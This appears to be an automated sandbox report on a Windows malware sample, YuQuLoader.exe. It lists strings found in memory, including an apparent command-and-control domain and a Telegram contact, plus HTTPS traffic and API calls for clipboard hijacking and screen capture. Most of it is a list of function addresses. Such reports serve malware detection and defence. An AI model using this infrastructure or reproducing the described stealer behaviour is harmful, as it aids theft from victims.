Source: YuQuLoader.exe, 00000002.00000003.1589161023.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589579772.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589446063.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1652000979.00000000015DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mrodularmall.top/aNzSrmal
Source: YuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mrodularmall.top/aR
Source: YuQuLoader.exe, 00000002.00000002.2618503724.0000000001664000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681284940.0000000001655000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681714373.0000000001663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mrodularmall.top/b
Source: YuQuLoader.exe, 00000002.00000003.1652149177.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mrodularmall.top:443/aNzSMicrosoft
Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: YuQuLoader.exe, 00000002.00000003.1400589271.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
Source: YuQuLoader.exe, 00000002.00000003.1400506439.000000000162F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/asdawfq
Source: YuQuLoader.exe, 00000002.00000002.2618072393.0000000001598000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/asdawfqyV-
Source: YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.telegram.org
Source: YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=3d938ea1e907c113ce_146508105965
Source: YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49721 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49725 version: TLS 1.2
                Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 2_2_0043F3A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard, | 2_2_0043F3A0
                Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 2_2_03B01000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber, | 2_2_03B01000
                Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: 2_2_0043F530 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, | 2_2_0043F530
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044B4102_2_0044B410
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00444C102_2_00444C10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004094302_2_00409430
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044C4C02_2_0044C4C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041255F2_2_0041255F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040DD742_2_0040DD74
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004035002_2_00403500
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00407D202_2_00407D20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004255202_2_00425520
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004215302_2_00421530
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00432DC02_2_00432DC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040C5E02_2_0040C5E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043A58C2_2_0043A58C
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00424D902_2_00424D90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040CDB02_2_0040CDB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004436402_2_00443640
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004456402_2_00445640
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00430E4F2_2_00430E4F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041366E2_2_0041366E
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00431E702_2_00431E70
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043AE042_2_0043AE04
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041E6182_2_0041E618
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00437E232_2_00437E23
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042EEC02_2_0042EEC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00426EC12_2_00426EC1
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041C6C42_2_0041C6C4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00403EA02_2_00403EA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00408EA02_2_00408EA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004366A02_2_004366A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041F6A92_2_0041F6A9
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00437EB02_2_00437EB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043774D2_2_0043774D
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004297502_2_00429750
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00444F502_2_00444F50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004027602_2_00402760
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004387702_2_00438770
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00437F172_2_00437F17
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043671D2_2_0043671D
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042F72E2_2_0042F72E
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00413FC02_2_00413FC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004257C02_2_004257C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004207F82_2_004207F8
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004047822_2_00404782
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00406F862_2_00406F86
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040EFAC2_2_0040EFAC
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041DFB12_2_0041DFB1
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042E7B42_2_0042E7B4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9C0A02_2_00A9C0A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A960A02_2_00A960A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC58A02_2_00AC58A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC68A02_2_00AC68A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE28A02_2_00AE28A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF78A02_2_00AF78A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAD8E02_2_00AAD8E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC98F02_2_00AC98F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD18F02_2_00AD18F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF88F02_2_00AF88F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAE0D02_2_00AAE0D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AED0D02_2_00AED0D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA80202_2_00AA8020
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB80202_2_00AB8020
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE90302_2_00AE9030
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA48102_2_00AA4810
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACA8162_2_00ACA816
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B150722_2_00B15072
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A998602_2_00A99860
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9D8702_2_00A9D870
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAD0702_2_00AAD070
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA00702_2_00AA0070
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACE0502_2_00ACE050
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA79802_2_00AA7980
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD21952_2_00AD2195
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9E9E02_2_00A9E9E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B131F82_2_00B131F8
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE59E02_2_00AE59E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AED9C02_2_00AED9C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFA9C02_2_00AFA9C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA51302_2_00AA5130
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC51302_2_00AC5130
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ADC9102_2_00ADC910
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB71602_2_00AB7160
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACD1602_2_00ACD160
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA29402_2_00AA2940
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD01402_2_00AD0140
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACC1502_2_00ACC150
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A99AA02_2_00A99AA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABEAB12_2_00ABEAB1
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABD2B02_2_00ABD2B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ADC2B02_2_00ADC2B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A97A802_2_00A97A80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A972802_2_00A97280
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF4A802_2_00AF4A80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC82902_2_00AC8290
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEC2902_2_00AEC290
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAF2F02_2_00AAF2F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAA2F02_2_00AAA2F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABA2F02_2_00ABA2F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC4AF02_2_00AC4AF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB6A202_2_00AB6A20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ADEA202_2_00ADEA20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA0A102_2_00AA0A10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB0A102_2_00AB0A10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF0A102_2_00AF0A10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE72602_2_00AE7260
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAFA402_2_00AAFA40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB4A402_2_00AB4A40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC72402_2_00AC7240
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA72502_2_00AA7250
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB2BA02_2_00AB2BA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ADD3A02_2_00ADD3A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9C3B02_2_00A9C3B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A98BB02_2_00A98BB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AED3B02_2_00AED3B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA23802_2_00AA2380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABC3802_2_00ABC380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB03802_2_00AB0380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACFB802_2_00ACFB80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEB3802_2_00AEB380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF5B802_2_00AF5B80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFD3E82_2_00AFD3E8
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9ABC02_2_00A9ABC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB93D02_2_00AB93D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC5BD02_2_00AC5BD0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA3B202_2_00AA3B20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB13302_2_00AB1330
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABFB302_2_00ABFB30
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE93302_2_00AE9330
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD4B002_2_00AD4B00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFA3002_2_00AFA300
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAEB102_2_00AAEB10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC53602_2_00AC5360
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF03602_2_00AF0360
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAD3402_2_00AAD340
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB5B402_2_00AB5B40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC23502_2_00AC2350
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD3B502_2_00AD3B50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE43502_2_00AE4350
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9FCA02_2_00A9FCA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD04B02_2_00AD04B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEACB02_2_00AEACB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEE4802_2_00AEE480
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF24802_2_00AF2480
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE8C902_2_00AE8C90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AACCE02_2_00AACCE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB34E02_2_00AB34E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC34E02_2_00AC34E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9A4F02_2_00A9A4F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA1CF02_2_00AA1CF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD4CF02_2_00AD4CF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE04F02_2_00AE04F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC1CC02_2_00AC1CC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACBC202_2_00ACBC20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE6C202_2_00AE6C20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC44302_2_00AC4430
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA44002_2_00AA4400
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE9C002_2_00AE9C00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD6C102_2_00AD6C10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC9C702_2_00AC9C70
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA9DA02_2_00AA9DA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A975B02_2_00A975B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B01DAA2_2_00B01DAA
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB05902_2_00AB0590
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFA5902_2_00AFA590
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA2DE02_2_00AA2DE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE5DE02_2_00AE5DE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF85E02_2_00AF85E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A985F02_2_00A985F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9E5C02_2_00A9E5C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA25302_2_00AA2530
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B07D102_2_00B07D10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A94D602_2_00A94D60
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA65602_2_00AA6560
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9BD402_2_00A9BD40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB45402_2_00AB4540
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF7D402_2_00AF7D40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB6D502_2_00AB6D50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABEE812_2_00ABEE81
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE2E802_2_00AE2E80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A96E902_2_00A96E90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF3E902_2_00AF3E90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9CEE02_2_00A9CEE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A936F02_2_00A936F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD26F02_2_00AD26F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC3ED02_2_00AC3ED0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB5E202_2_00AB5E20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC76302_2_00AC7630
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC7E302_2_00AC7E30
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF46302_2_00AF4630
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A97E002_2_00A97E00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA06002_2_00AA0600
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABC6002_2_00ABC600
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB3E002_2_00AB3E00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF4E682_2_00AF4E68
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC5E702_2_00AC5E70
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE8E402_2_00AE8E40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AF06402_2_00AF0640
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ADA6502_2_00ADA650
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACA7A02_2_00ACA7A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE87A02_2_00AE87A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEA7A02_2_00AEA7A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA57B02_2_00AA57B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEB7B02_2_00AEB7B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AA1F802_2_00AA1F80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABA7902_2_00ABA790
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB97E02_2_00AB97E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ABCFE02_2_00ABCFE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE37E02_2_00AE37E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAFFC02_2_00AAFFC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AC7FC02_2_00AC7FC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A947D02_2_00A947D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAF7D02_2_00AAF7D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB3FD02_2_00AB3FD0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD37202_2_00AD3720
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AAC7302_2_00AAC730
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACE7302_2_00ACE730
